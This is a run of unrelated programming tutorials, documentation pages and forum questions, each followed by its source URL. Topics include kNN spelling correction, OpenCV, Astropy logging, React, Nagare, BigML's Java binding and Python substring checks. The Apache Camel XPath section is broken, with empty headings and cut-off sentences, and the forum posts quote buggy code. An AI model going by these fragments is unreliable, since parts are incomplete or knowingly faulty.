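        class_counter[label] += 1 / (dist + 1)
    winner, votes4winner = class_counter.most_common(1)[0]
    total = sum(class_counter.values())
    if all_results:
        return winner, [(lbl, w / total) for lbl, w in class_counter.most_common()]
    return winner, votes4winner / total
```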
Windows users and others can download the file as /data1/british-english.txt.

for word in [..., "thoes", "innerstand", "blagrufoo", "liberdi"]:
    neighbors = get_neighbors(words, words, word, 3, distance=levenshtein)
    print("vote_distance_weights: ", vote_distance_weights(neighbors, all_results=False))
    print("vote_prob: ", vote_prob(neighbors))
    print("vote_distance_weights: ", vote_distance_weights(neighbors))

OUTPUT:
vote_distance_weights: ('helpful', 0.5555555555555556)
vote_prob: ('helpful', 0.3333333333333333)
vote_distance_weights: ('helpful', [('helpful', 0.5555555555555556), ('doleful', 0.22222222222222227), ('hopeful', 0.22222222222222227)])
vote_distance_weights: ('kindness', 0.5)
vote_prob: ('kindness', 0.3333333333333333)
vote_distance_weights: ('kindness', [('kindness', 0.5), ('fondness', 0.25), ('kudos', 0.25)])
vote_distance_weights: ('helpless', 0.3333333333333333)
vote_prob: ('helpless', 0.3333333333333333)
vote_distance_weights: ('helpless', [('helpless', 0.3333333333333333), ("hippo's", 0.3333333333333333), ('hippos', 0.3333333333333333)])
vote_distance_weights: ('hoes', 0.3333333333333333)
vote_prob: ('hoes', 0.3333333333333333)
vote_distance_weights: ('hoes', [('hoes', 0.3333333333333333), ('shoes', 0.3333333333333333), ('thees', 0.3333333333333333)])
vote_distance_weights: ('understand', 0.5)
vote_prob: ('understand', 0.3333333333333333)
vote_distance_weights: ('understand', [('understand', 0.5), ('interstate', 0.25), ('understands', 0.25)])
vote_distance_weights: ('barefoot', 0.4333333333333333)
vote_prob: ('barefoot', 0.3333333333333333)
vote_distance_weights: ('barefoot', [('barefoot', 0.4333333333333333), ('Baguio', 0.2833333333333333), ('Blackfoot', 0.2833333333333333)])
vote_distance_weights: ('liberal', 0.4)
vote_prob: ('liberal', 0.3333333333333333)
vote_distance_weights: ('liberal', [('liberal', 0.4), ('liberty', 0.4), ('Hibernia', 0.2)])
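The levenshtein distance function passed to get_neighbors above was not defined in this copy. A standard dynamic-programming implementation of the Levenshtein (edit) distance, counting the minimum number of single-character insertions, deletions, and substitutions, looks like the sketch below; this is a generic implementation, not necessarily the tutorial's exact code:

```python
def levenshtein(a, b):
    """Minimum number of single-character edits turning a into b."""
    # prev holds the previous row of the DP matrix
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]

print(levenshtein("thoes", "hoes"))     # → 1 (one deletion)
print(levenshtein("kitten", "sitting")) # → 3
```

Because it only keeps two rows of the matrix, this version runs in O(len(a) * len(b)) time but O(len(b)) memory, which matters when comparing a misspelled word against every entry of a dictionary.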
https://python-course.eu/machine-learning/k-nearest-neighbor-classifier-in-python.php
#include <iostream>
using namespace std;

// Use the following screen shots as a guide.
int main()
{
    double scores[75];
    int counter = -1;
    do
    {
        counter++;
        cout << "Please enter a score (enter -1 to stop): ";
        cin >> scores[counter];
    } while (scores[counter] >= 0);

    for (int y = 0; y > counter; y++)
    {
        double x, lowest = 100, highest = 0;
        if (lowest > scores) lowest = x;
        if (highest < x) highest = x;
        cout << "Highest is " << highest << endl;
        cout << "Lowest is " << lowest << endl;
    }
}

I am having trouble finding the average of the numbers entered. When I enter -1, the program should output the average first, then the highest number, and lastly the lowest number. I am not sure how to work with this type of program; I am a noob and stuck. I have been working on this program for a long, long time now and any little advice or help would be appreciated.
http://www.dreamincode.net/forums/topic/142757-finding-the-average-highest-and-lowest-number-of-an-array/
OpenCV is one of the most common libraries that you need in any computer vision or image processing task. Before applying different filters for image processing or performing any image-related task, you must know how to read, display, and write an image. OpenCV comes with built-in functions to perform these basic operations. Let's see how you can use these functions in your task. Before performing any operation, make sure you have OpenCV, Numpy, and Matplotlib (optional) in your system. OpenCV uses Numpy in the backend, and Matplotlib is required for displaying images. You can follow our OpenCV Intro Guide to see how you can install it.

This is the original image that is going to be used here:

Photo by Nick Fewings on Unsplash.

Reading an Image

OpenCV has a built-in function that will read/load/open an image, which is cv2.imread(). Let's see the syntax:

import cv2
cv2.imread(Pathname, Flag)

It consists of two arguments:

- Pathname: It contains the pathname of the image to be read. Make sure your image is in the same directory, or specify the full pathname of the image; otherwise you will get an empty result.
- Flag: It is an optional argument. It sets the mode in which the image is read. There are three flags:

cv2.IMREAD_COLOR or 1: This will read the image in color mode, removing any transparency from the image. OpenCV loads the color image in a BGR 8-bit format. This flag is used by default.

cv2.IMREAD_GRAYSCALE or 0: This will read the image in grayscale mode.

cv2.IMREAD_UNCHANGED or -1: This will read the image as it is, including the alpha channel if it is present.

Let's see how you can read an image by using the three different flags:

img_colored = cv2.imread('dog.jpg', 1)
img_grayscale = cv2.imread('dog.jpg', 0)
img_unchanged = cv2.imread('dog.jpg', -1)

The loaded image object will be a numpy ndarray. You can get its dimensions by using .shape.
Be careful, since it returns the height first, then the width, and for non-grayscale images it also returns the number of color channels:

img_colored = cv2.imread('dog.jpg', 1)
height, width, num_channels = img_colored.shape
print(type(img_colored))
print(height, width, num_channels)
# <class 'numpy.ndarray'>
# 404 606 3

img_grayscale = cv2.imread('dog.jpg', 0)
# only height and width for grayscale
height, width = img_grayscale.shape

Displaying an Image

OpenCV has a built-in function that will display an image in a window, which is cv2.imshow(). Let's see the syntax:

cv2.imshow(WindowName, Image)

It consists of two arguments:

- WindowName: It specifies the name of the window which contains the image. This will help you display multiple images at a time; you can specify a different window name for every image.
- Image: It is the image that will be displayed.

There are other functions that are used along with this function:

- cv2.waitKey(): It will display the window on the screen for a time period given in milliseconds. The value should be a positive integer. If the value is 0, it will hold the window indefinitely until you press a key.
- cv2.destroyAllWindows(): It will destroy all the open windows from the screen and from memory.
- cv2.destroyWindow(): It will destroy a specific window. The argument is the name of the window that you want to be destroyed.

Let's see how it looks:

img_colored = cv2.imread('dog.jpg', 1)
cv2.imshow('Colored Image', img_colored)

img_grayscale = cv2.imread('dog.jpg', 0)
cv2.imshow('Grayscale Image', img_grayscale)

Writing an Image

OpenCV has a built-in function that will write/save an image to the given path, which is cv2.imwrite(). It will save your image in the working directory. Let's see the syntax:

cv2.imwrite(FileName, Image)

It consists of two arguments:

- FileName: It contains the name of the file, which should be in a format such as .jpg, .png, etc.
- Image: It is the image that will be saved.

To sum it up, here is an example that loads an image in grayscale, displays it, and then saves it:

import cv2

# Reading an image
img_gray = cv2.imread('dog.jpg', 0)

# Display an image in a window
cv2.imshow('Grayscale Image', img_gray)

# Wait for a keystroke
cv2.waitKey(0)

# Destroy all the windows
cv2.destroyAllWindows()

# Write an image
cv2.imwrite('dog_grayscale.jpg', img_gray)

Drawing and working with images

You can use different functions to draw shapes and text in an image:

cv2.line
cv2.rectangle
cv2.circle
cv2.ellipse
cv2.polylines
cv2.putText

import numpy as np
import cv2

# Load a color image
img = cv2.imread('dog.jpg', 1)
height, width, channels = img.shape

# Draw a diagonal blue line with thickness of 5 px
img = cv2.line(img, (0, 0), (width - 1, height - 1), (255, 0, 0), 5)

# Rectangle: pt1, pt2, color, thickness
x1 = width // 2
img = cv2.rectangle(img, (x1, 0), (x1 + 150, 150), (0, 255, 0), 3)

# Circle: center, radius, color, thickness (-1 = fill)
img = cv2.circle(img, (447, 63), 63, (0, 0, 255), -1)

# Ellipse
img = cv2.ellipse(img, (width // 2, height // 2), (100, 50), 0, 0, 180, (0, 0, 255), -1)

# Polygon
pts = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32)
pts = pts.reshape((-1, 1, 2))
img = cv2.polylines(img, [pts], True, (0, 255, 255))

# Text
font = cv2.FONT_ITALIC
cv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 3, cv2.LINE_AA)

cv2.imshow('image', img)

This is how it looks:

End Notes

This article will help you start your OpenCV journey. You learned how to read an image, how to display it, how to save it in your local directory, and how to draw shapes in an image.
https://www.python-engineer.com/posts/opencv-images/
niks1020 25-07-2019

I have created one custom metadata schema (say: myCustomMetadataSchema) in which I mapped one of my text fields to a custom property as:

./jcr:content/metadata/myCustomField

Note that this field, myCustomField, does not have any namespace prefix like jcr, dam, iptc, et cetera. Now, when I export the metadata of assets from a folder on which myCustomMetadataSchema is applied, I get all the data as expected, even for those fields which do not have any namespace.

But when I upload the Excel file to update the above-mentioned property,

./jcr:content/metadata/myCustomField

the importer fails to update this field on the asset. The only reason I can think of is that this field does not have any namespace mapped to it. If I change this metadata schema field to have some namespace, let's say:

./jcr:content/metadata/dam:myCustomField

then the importer is able to make the change to the field on the asset.

Can somebody please let me know:

Please let me know if something can be done regarding this other than applying a namespace to the field.

Thanks,
Nikhil

Vish_dhaliwal Employee 26-07-2019

Hello,

Yes, it is a bug; the internal reference number is CQ-4269445, which is backported to 6.4 via NPR-29425, released in 6.4.5.0. Please test SP5 and see how it goes.

Regards,
Vishu
https://experienceleaguecommunities.adobe.com/t5/adobe-experience-manager/aem-6-4-metadata-import-not-working-for-fields-without-namespace/qaq-p/317889
Logging system¶

Overview¶

The Astropy logging system is designed to give users flexibility in deciding which log messages to show, to capture them, and to send them to a file. All messages printed by Astropy routines should use the built-in logging facility (normal print() calls should only be done by routines that are explicitly requested to print output). Messages can have one of several levels:

- DEBUG: Detailed information, typically of interest only when diagnosing problems.
- INFO: A message conveying information about the current task, and confirming that things are working as expected.
- WARNING: An indication that something unexpected happened, and that user action may be required.
- ERROR: Indicates a more serious issue, including exceptions.

By default, only WARNING and ERROR messages are displayed, and they are sent to a log file located at ~/.astropy/astropy.log (if the file is writeable).

Configuring the logging system¶

First, import the logger:

from astropy import log

The threshold level (defined above) for messages can be set with e.g.:

log.setLevel('INFO')

Color (enabled by default) can be disabled with:

log.disable_color()

and enabled with:

log.enable_color()

Warnings from warnings.warn can be logged with:

log.enable_warnings_logging()

which can be disabled with:

log.disable_warnings_logging()

and exceptions can be included in the log with:

log.enable_exception_logging()

which can be disabled with:

log.disable_exception_logging()

It is also possible to set these settings from the Astropy configuration file, which also allows an overall log file to be specified. See Using the configuration file for more information.

Context managers¶

In some cases, you may want to capture the log messages, for example to check whether a specific message was output, or to log the messages from a specific section of code to a file. Both of these are possible using context managers.
To add the log messages to a list, first import the logger if you have not already done so: from astropy import log then enclose the code in which you want to log the messages to a list in a with statement: with log.log_to_list() as log_list: # your code here In the above example, once the block of code has executed, log_list will be a Python list containing all the Astropy logging messages that were raised. Note that messages continue to be output as normal. Similarly, you can output the log messages of a specific section of code to a file using: with log.log_to_file('myfile.log'): # your code here which will add all the messages to myfile.log (this is in addition to the overall log file mentioned in Using the configuration file). While these context managers will include all the messages emitted by the logger (using the global level set by log.setLevel), it is possible to filter a subset of these using filter_level=, and specifying one of 'DEBUG', 'INFO', 'WARN', 'ERROR'. Note that if filter_level is a lower level than that set via setLevel, only messages with the level set by setLevel or higher will be included (i.e. filter_level is only filtering a subset of the messages normally emitted by the logger). Similarly, it is possible to filter a subset of the messages by origin by specifying filter_origin= followed by a string. If the origin of a message starts with that string, the message will be included in the context manager. For example, filter_origin='astropy.wcs' will include only messages emitted in the astropy.wcs sub-package. Using the configuration file¶ Options for the logger can be set in the [config.logging_helper] section of the Astropy configuration file: [config.logging_helper] # Threshold for the logging messages. Logging messages that are less severe # than this level will be ignored. 
# The levels are 'DEBUG', 'INFO', 'WARNING', 'ERROR'
log_level = 'INFO'

# Whether to use color for the level names
use_color = True

# Whether to log warnings.warn calls
log_warnings = False

# Whether to log exceptions before raising them
log_exceptions = False

# Whether to always log messages to a log file
log_to_file = True

# The file to log messages to
log_file_path = '~/.astropy/astropy.log'

# Threshold for logging messages to log_file_path
log_file_level = 'INFO'

# Format for log file entries
log_file_format = '%(asctime)s, %(origin)s, %(levelname)s, %(message)s'
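Astropy's log object is built on Python's standard logging module, so the level-threshold and list-capturing behavior described above can be sketched with the stdlib alone. The handler class and logger name below are illustrative, not Astropy's actual implementation:

```python
import logging

# a handler that captures records into a list, similar in spirit
# to what log.log_to_list() provides
class ListHandler(logging.Handler):
    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(record)

logger = logging.getLogger("demo")
logger.setLevel(logging.WARNING)   # analogous to log.setLevel('WARNING')
handler = ListHandler()
logger.addHandler(handler)

logger.info("routine progress message")   # below threshold: dropped
logger.warning("something unexpected")    # captured
logger.error("something went wrong")      # captured

print([r.levelname for r in handler.records])  # → ['WARNING', 'ERROR']
```

Filtering by origin, as filter_origin= does, would amount to inspecting each record's source attribute inside emit() before appending it.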
http://docs.astropy.org/en/stable/logging.html
Our code doesn't do anything yet because we haven't included our new page in the app, so please go back to index.js and modify it to this:

src/index.js

import React from 'react';
import ReactDOM from 'react-dom';
import Detail from './pages/Detail';

ReactDOM.render(
  <Detail />,
  document.getElementById('app')
);

Save both index.js and Detail.js and, all being well, you should be able to return to your web browser and see "This is React rendering HTML!" right there on the screen. Don't see anything? You may have made a typo, and should look in your browser's console for more information. Sometimes the error messages can be a bit obscure, so you might need to investigate carefully. For example, the error message "Super expression must either be null or a function, not undefined" probably means you created the Detail component using class Detail extends React.component rather than class Detail extends React.Component (note that the difference of a capital C in Component is all it takes to break it). As another example, an error message similar to "ERROR in ./src/index.js: Unexpected token (7:2)" actually means you probably forgot to modify your package.json file way back in chapter one: the new lines that load Babel presets for es2015 and react are required, so please go back to chapter one and ensure your package.json file is correct.

Anyway, before I explain what the new code does, try going back to Detail.js and modify its render method to say "This is JSX being converted to HTML!" If you do that, then press save again, you'll see some magic happen: your web browser will automatically update to show the new message. You don't need to run any commands or indeed take any other action than saving your code; Webpack Dev Server automatically detects the change and reloads your work.
Hopefully you can now see why it was so important to get the Webpack configuration right at the start of this tutorial, because using this development setup (known as "hot loading") makes coding substantially faster. Note: if you don't see any changes, just hit Refresh in your browser.

Now, let me explain what the new code in index.js does. When our app gets built, that <Detail /> line automatically gets converted into the Detail component we created inside Detail.js, which in turn has its render() method called so it draws to the screen.

Now, before we continue, you probably have some questions. Let me try to answer some:

What does <Detail /> mean? We don't give the component a name inside Detail.js, so instead the name comes from the way we import it: if you use import Bob from './pages/Detail'; then you could write <Bob /> and it would work just fine. (But please don't do that if you value your sanity!)

To recap, so far you've learned:

Not bad, but that's just the beginning…!
http://www.hackingwithreact.com/read/1/4/importing-react-components-using-es6
Chapter 347. XPath Language

Available as of Camel version 1.1.

from("queue:foo").
    filter().xpath("//foo").
    to("queue:bar")

from("queue:foo").
    choice().xpath("//foo").to("queue:bar").
    otherwise().to("queue:others");

347.1. XPath Language options

The XPath language supports 9 options, which are listed below.

347.2. Namespaces

You can easily use namespaces with XPath expressions using the Namespaces helper class.

347.3. Variables

Variables in XPath are defined in different namespaces. The default namespace is. Camel will resolve variables according to either:

- namespace given
- no namespace given

347.3.1. Namespace.

347.3.2.

347.4. Functions

Camel adds the following XPath functions that can be used to access the exchange: function:properties and function:simple are not supported when the return type is a NodeSet, such as when using with a Splitter EIP. Here's an example showing some of these functions in use. And the new functions introduced in Camel 2.5:

347.6. Setting.

347.7. Using XPath on Headers

Available as of

347.8. Examples:

347.9. XPath injection

public class Foo {

    @MessageDriven(uri = "activemq:my.queue")
    public void doSomething(@MyXPath("/ns1:foo/ns2:bar/text()") String correlationID,
                            @Body String body) {
        // process the inbound message here
    }
}

347.10.

347.11. Using Saxon with XPathBuilder

Available as of Camel 2.3

347.12.

347.13. Enabling Saxon from Spring DSL

Available as of

347.14. Namespace auditing to aid debugging

Available as of

347.15.

347.16. Loading script from external resource

.xpath("resource:classpath:myxpath.txt", String.class)

347.17. Dependencies

The XPath language is part of camel-core.
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/html/apache_camel_component_reference/xpath-language
Nagare Tutorial, learning concepts

The goals of Nagare are to develop a web application similar to any standard Python application. There are three steps to reach this goal:

- Do everything in Python (no SQL, no templating language, avoid JavaScript as much as possible)
- Hide request/response mechanics; there is no manual handling of the session
- Use aggregation as the shortest way to transform any Python object into a Nagare component

Part 2, modify the default application

With nagare-admin create-app a complete setuptools-compatible package is created. Some Nagare-specific files are also created:

- conf/tutorial.cfg: application configuration file
- data: folder where read/write data are expected (sqlite database, csv files, etc.)
- static: folder where HTML static files are stored (css, images and javascript)
- tutorial/models.py: file where database models are defined using the Elixir/SQLAlchemy ORM
- tutorial/app.py: code of your application

Let's start with a pure Python class. Replace the whole content of tutorial/app.py with:

class Counter(object):
    def __init__(self):
        self.val = 0

    def increase(self):
        self.val += 1

    def decrease(self):
        self.val -= 1

- Now, add an HTML view for the Counter class:

from nagare import presentation

...

@presentation.render_for(Counter)
def render(counter, h, *args):
    return "Hello"

For Nagare, a view is just a function that takes a renderer (h) as a parameter and returns a DOM tree. In this example, we return a simple DOM tree with only one text node. To bind the view to the Counter class, we import Nagare's presentation service and use the render_for decorator.

- Define the Nagare application:

For Nagare, an application is just an object factory (i.e. a callable that returns an object graph), and obviously a class is one, so we just have to add the following to our app.py file:

...

# define app
app = Counter

- You can now view your new web application in your browser (go to '').
If you look at the new webpage source, you will see that Nagare has wrapped the text node in a valid HTML structure. By default, the DOM tree is serialized as HTML4. This can be changed in the application configuration file, to use XHTML if the browser accepts it.

- A more complex DOM tree:

Replace the Counter view with the following one:

...

@presentation.render_for(Counter)
def render(counter, h, *args):
    return h.div("Value: ", counter.val)

...

As you can see, the HTML renderer h can be used as a factory for HTML tags. h can also be seen as a namespace: it only accepts a list of defined tags (all of the HTML tags, but not one more). As we build a DOM tree, we are protected against code injection. For example, suppose counter.val contains something like:

"<script>alert('Hello World');</script>"

This string will be escaped and no JavaScript will ever be executed. To do something like that, you must parse the HTML string into a DOM tree and append the resulting DOM tree to the renderer.
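The escaping behavior described above can be illustrated with Python's standard library alone: html.escape() produces the same kind of entity-encoded output that a serializer applies to text nodes. This is a stand-alone illustration of the concept, not Nagare's actual code path:

```python
import html

# a malicious value a user might sneak into counter.val
payload = "<script>alert('Hello World');</script>"

escaped = html.escape(payload)
print(escaped)
# → &lt;script&gt;alert(&#x27;Hello World&#x27;);&lt;/script&gt;
```

Because the angle brackets become entities, the browser renders the text literally instead of executing it, which is why building a DOM tree (rather than concatenating strings) protects against injection by default.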
http://www.nagare.org/trac/wiki/NagareTutorial2?version=3
Machine Learning in Java has never been easier!

Java is by far one of the most popular programming languages. It's at the top of the TIOBE index, and thousands of the most robust, secure, and scalable backends have been built in Java. In addition, there are many wonderful libraries available that can help accelerate your project enormously. For example, most of BigML's backend is developed in Clojure, which runs on top of the Java Virtual Machine. And don't forget the ever-growing Android market, with 850K new devices activated each day!

There are a number of machine learning Java libraries available to help build smart data-driven applications. Weka is one of the more popular options. In fact, some of BigML's team members were Weka users as far back as the late 90s. We even used it as part of the first BigML backend prototype in early 2011. Apache Mahout is another great Java library if you want to deal with bigger amounts of data. However, in both cases you cannot avoid "the fun of running servers, installing packages, writing MapReduce jobs, and generally behaving like IT ops folks". In addition, you need to be concerned with selecting and parametrizing the best algorithm to learn from your data, as well as finding a way to activate and integrate the model that you generate into your application.

Thus we are thrilled to announce the availability of the first open-source Java library that easily connects any Java application with the BigML REST API. It has been developed by Javi Garcia, an old friend of ours. A few of the BigML team members have been lucky enough to work with Javi in two other companies in the past.

With this new library, in just a few lines of code you can create a predictive model and generate predictions for any application domain: from finding the best price for a new product to forecasting sales, creating recommendations, diagnosing malfunctions, or detecting anomalies.
The library is shipped with Maven as project manager and has a test suite developed using Cucumber. If you clone it from GitHub and add your BigML credentials to src/main/resources/binding.properties, you can run the tests:

mvn test

If you're a Maven aficionado, you can add BigML to your project by following these two steps:

- Install the library to your local Maven repo by executing "mvn install" in the bigml-java directory.
- Add the dependencies to your pom.xml:

<dependency>
  <groupId>org.bigml</groupId>
  <artifactId>java-binding</artifactId>
  <version>1.0-SNAPSHOT</version>
</dependency>
<dependency>
  <groupId>com.googlecode.json-simple</groupId>
  <artifactId>json-simple</artifactId>
  <version>1.1.1</version>
</dependency>

The json-simple dependency is used to wrap the responses of the BigML client. Below you can see the simplest Java class integrating the BigML binding:

import org.bigml.binding.AuthenticationException;
import org.bigml.binding.BigMLClient;
import org.json.simple.JSONObject;

public class BigmlClient {

    /**
     * A simple Java class to integrate the BigML API
     */
    public static void main(String[] args) {
        BigMLClient bigml = null;
        try {
            // BigML API credentials might be passed as parameters
            bigml = BigMLClient.getInstance();
        } catch (AuthenticationException e) {
            e.printStackTrace();
            return;
        }

        // Create a datasource by uploading a file
        JSONObject source = bigml.createSource("data/iris.csv", "My First Source", null);
        System.out.println(source.toJSONString());

        // Wait until the source is ready
        while (!bigml.sourceIsReady(source)) {
            source = bigml.getSource(source);
            System.out.println("Waiting for source to be ready");
        }
        System.out.println(source.toJSONString());
    }
}

That's all you need to start using BigML in your Java application. If you are a developer and want to start using our API right away, just drop a line to info@bigml.com and we'll send you an invite. Happy Java Hacking!
https://blog.bigml.com/2012/06/07/machine-learning-in-java-has-never-been-easier/
Hi, I am having some problems porting a C program (traffic simulator) to C++ using the g++ compiler. For a car structure defined in a C header file:

typedef struct  /* type definition for cars */
{
    int id;           /* car identifier */
    int color;
    double distance;  /* distance travelled so far */
    double speed;     /* speed of the car */
    int x, y;         /* graphics: x & y coords of the car */
    void *nextlane;   /* the lane we will enter in the next junc */
    void *behind;     /* pointer to car behind in the lane */
    int part;
} car_t;

which I included in the C++ program as follows:

extern "C"
{
#include "traffic.h"
...
}

I need to do a cast in my C++ main program, as follows, before it compiles without errors:

c = (car_t *) fc->behind;

but when I run the simulation it gives me a segmentation fault where I am using car c, for example:

c->distance

It does not give that error when the program first goes through the simulation loop, i.e. only when it goes to the next car after the casting step. I think there is a problem with the way I am casting, or I have missed some steps somewhere. Any help will be appreciated, as this has already taken too much of my time.

Thanks,
Josh
http://forums.devshed.com/programming/83214-casting-segmentation-fault-last-post.html
Strings are a collection of characters enclosed in single or double quotes in Python. You may need to verify whether a string contains a substring during various string manipulation operations; one way to do this is with the in keyword and an if statement. We regularly meet this situation in Python web development, where we must identify whether a specific member from a given list is a substring or not, and it is a common occurrence in machine learning work as well. We will have a look at some options for doing so.

In this Python article, we'll check if a Python string contains a substring. We examine several methods for doing so and discuss their applications in depth. Each has its own set of uses, benefits, and drawbacks.

Ways to check for a substring in a Python string:

- Using the in operator
- Using the index() method
- Using the find() method
- Using the string methods
- Using the count() method
- Using regular expressions

Why would you want to see if a Python string has a substring?

We check if a Python string has a substring for various reasons, but conditional statements are the most typical application: a specific block of code is executed when the substring is present. Another popular application is to determine the index of a substring within a string. You have probably seen a contains method in other programming languages; Python supports this as well (via the __contains__ method), and it also includes a couple of faster and more readable ways to check whether a string contains a substring. We'll take a look at these in more detail below.

Using the in operator

The in operator is the most straightforward, Pythonic technique to determine whether a Python string includes a substring.
The membership operators in and not in take two arguments and determine whether one is a member of the other. They return a boolean answer. The in operator can only tell you whether a Python string contains a substring; if you need to know the index of the substring, the solutions below can help. It is a faster alternative to calling the __contains__() method directly, and it may also be used to check whether an item exists in a list. in has the following syntax:

substring in string

The syntax for not in is the same as it is for in. To see if a Python string has a substring, we can use the following code:

if "Code" in "Codeunderscored is the best coding site":
    print("Exists")
else:
    print("Does not exist")

Because the in operator is case sensitive, the above code would have printed "Does not exist" if the substring had been "code", so combining it with the .lower() method is a good idea. This method lowers the case of the string; it does not affect the original string, because strings are immutable.

if "code" in "Codeunderscored is the best coding site".lower():
    print("Exists")
else:
    print("Does not exist")

String methods in action

Python has a few string methods for determining whether or not a string contains a substring. We'll look at the index() and find() methods, among others. These methods locate and return the substring's index. They do, however, have a few drawbacks, which we shall go over in detail.

Using the index() method

The string.index() method returns the starting index of the substring passed as a parameter. A huge disadvantage is that it raises a ValueError if the substring does not exist; a try/except can be used to handle this. index() has the following syntax:

string.index(value, start, stop)

The value is the substring, and the string refers to the Python string. There are two optional parameters: start and stop. These accept index values and aid in searching for a substring within a given index range.
index() is used in the following code:

string = "Codeunderscored is the best coding site."
sti = "Code"
try:
    "Codeunderscored is the best coding site".index("Code")
except ValueError:
    print("Does not exist")
else:
    print(string.index(sti))

Because index() is case sensitive, make sure you combine it with the .lower() function to avoid surprises (note that the lowered substring must then be searched for):

try:
    "Codeunderscored is the best coding site".lower().index("code")
except ValueError:
    print("Does not exist")
else:
    print(string.lower().index("code"))

Using find()
Another method that we might use to check our query is find(). find() returns the starting index of the substring in the same way as index() does. Unlike index(), however, find() returns -1 if the substring does not exist. Be careful: -1 is also the negative index of the rightmost character, so compare the return value against -1 rather than using it blindly. find() has the following syntax:

string.find(value, start, end)

Parameter definitions:
- value: the substring to be located in the string.
- start (optional): the index at which to start searching for the substring within the string.
- end (optional): the index at which to stop searching for the substring.

If the start and end indexes are not specified, 0 is used as the start index and the length of the string as the end index by default. find() takes the same parameters as index(). As a result, find() is used in the following code:

if "Codeunderscored is the best coding site".find("Code") != -1:
    print("Codeunderscored is the best coding site".find("Code"))
else:
    print("Does not exist")

And, once again, find() is case sensitive, requiring the usage of the .lower() method:

if "Codeunderscored is the best coding site".lower().find("code") != -1:
    print("Codeunderscored is the best coding site".lower().find("code"))
else:
    print("Does not exist")

Example: using find()

str = "Hello, its Codeunderscored!"
if str.find("underscored") != -1:
    print("Found the string")
else:
    print("Not found!!!")

# Substring is searched for between start index 2 and end index 5
print(str.find('its', 2, 5))

# Substring is searched for between start index 8 and end index 18
print(str.find('its ', 8, 18))

# How to use find()
if str.find('gloomy') != -1:
    print("Contains given substring ")
else:
    print("Doesn't contain the given substring")

Although using the str.find() method is less Pythonic, it is still acceptable. It's a little lengthier and more perplexing, but it gets the job done.

Regular expressions in Python
Regular expressions are commonly employed for pattern matching. re is a built-in module in Python that may be used to work with regular expressions. The search() function in the re module is used to see whether a string contains the supplied search pattern. The syntax for re.search() is as follows:

re.search(pattern, string, flags[optional])

Code sample:

from re import search

str = "Codeunderscored is all about coding!"
substring = "coding"
if search(substring, str):
    print("Substring Found!")
else:
    print("Not found!")

Example: using regex to find a substring

from re import search

string = "Codeunderscored.com"
substring = ".com"
if search(substring, string):
    print("Found")
else:
    print("Not found")

Keep in mind that "." is a regex metacharacter matching any character; escape it as "\.com" if you need to match a literal dot. When doing simple operations on strings, prefer the other methods covered in this post over regex, since they are much faster.

Counting substrings with the str.count() method
The Python count() function counts the number of times a given substring appears in a string. The function returns 0 if the substring is not found in the string.

str = "Codeunderscored is all about coding."
str.count("coding")
str.count("Coding")

The __contains__() function
The __contains__() function of the Python String class is used to see whether a string contains another string. When we use the Python in operator, the __contains__() method is called internally.
Although methods that begin with underscores are regarded as semantically private, the in operator is recommended for readability. The __contains__ method defines how instances of a class behave when they appear on the right side of the in and not in operators. We could also call this function directly, but we won't.

What are the caveats and limitations?
Because all of these methods are case sensitive, remember to combine them with the .lower() method, and make sure calls to index() are placed inside a try/except block.

Example: using list comprehension
In our next example, we use a list comprehension, a technique for determining whether or not a string contains a substring from a list. We check each list entry against the string to see whether we can find a match; if we can, the result is truthy. The code below shows how to use a list comprehension to determine whether a text contains a list element. To begin, the string principles_message is created. After that, the test list fruits_list is created. For convenience, we print the original principles_message string and the list before performing the check. Then we use a list comprehension to see whether the string contains any list element, and print the result.

principles_message = "Two students in the classroom will each take up two Bananas."
fruits_list = ['Mango', 'Bananas']

print("Principles message : " + principles_message)
print("List of fruits : " + str(fruits_list))

the_result = [ele for ele in fruits_list if(ele in principles_message)]
print("Is there a list element in the string? " + str(bool(the_result)))

Example: check whether a substring is found several times in a string
The count() function of the String class can be used to check whether a string contains a substring twice. count() returns the number of times the substring appears in the string, and 0 if the substring is not present. Check whether the count is equal to two to see whether it exists twice.
string = "codeunderscored is a site dedicated to code."
if string.count("code") == 2:
    print("code exists twice in the string")
else:
    print("code doesn't exist twice in the string")

Example: check whether the string contains any substring from the list
You may need to see whether a string contains one of a list's multiple substrings. For example, you could need to see whether the given string contains any vowels. You can do this in Python by combining a comprehension with the any() method. The comprehension yields True each time the iterated item is found in the string, and False otherwise, so the overall result is a sequence of True/False values. The any() method then verifies whether there is at least one True value in the generated sequence. If yes, the string has at least one vowel. If the answer is no, the string is devoid of vowels.

# Code Snippet
string = "Codeunderscored is a site dedicated to code"
vowel_list = ['a', 'e', 'i', 'o', 'u']

if any(substring in string for substring in vowel_list):
    print("Vowels exist in the string")
else:
    print("Vowels don't exist in the string")

Example: find all of a substring's indexes
The finditer() method in the regular expression module can be used to find the index of every occurrence of a substring in a string. Import the regular expression module with import re to use it. To find all substring indexes in a string, use the procedure below.

# Code Snippet
import re

string = "codeunderscored is a site dedicated to code"
matches = re.finditer("code", string)
indexes = [match.start() for match in matches]
print(indexes)

Example: count the number of times a substring appears
The count() method counts the number of times a substring appears in a string. count() returns the number of occurrences, or 0 if the substring does not exist.
# Code Snippet
string = "codeunderscored is a site dedicated to code"
substring = "code"
print(string.count(substring))

Conclusion
Checking whether a string contains a substring is one of the most common tasks in any programming language, and Python offers several techniques for it. Remember that the in operator, used as a comparison operator, is the simplest and fastest way to verify whether a string contains a substring. Other Python functions, such as find(), index(), and count(), can also be used, depending on whether you need the substring's position or its number of occurrences.
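As a recap, here is each technique from this article applied to the same sample string:

```python
import re

s = "codeunderscored is a site dedicated to code"

print("code" in s)                 # membership test -> True
print(s.find("site"))              # index of first match, -1 if absent -> 21
print(s.index("site"))             # like find(), but raises ValueError if absent
print(s.count("code"))             # number of occurrences -> 2
print(bool(re.search("cod.", s)))  # regex pattern match -> True
```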
